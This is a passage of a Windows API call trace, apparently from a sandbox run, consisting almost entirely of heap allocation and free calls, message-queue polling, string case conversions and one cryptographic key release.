(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.614] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.614] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.614] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0160.614] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.614] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.619] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.621] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.622] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0160.622] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.622] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0160.622] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.622] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.622] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.622] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.623] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.623] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.623] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.623] CryptDestroyKey (hKey=0xaa55e0) returned 1 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.625] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.626] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.627] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.627] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.627] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.628] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.628] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.628] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.628] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.629] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.629] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.629] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0160.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0160.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 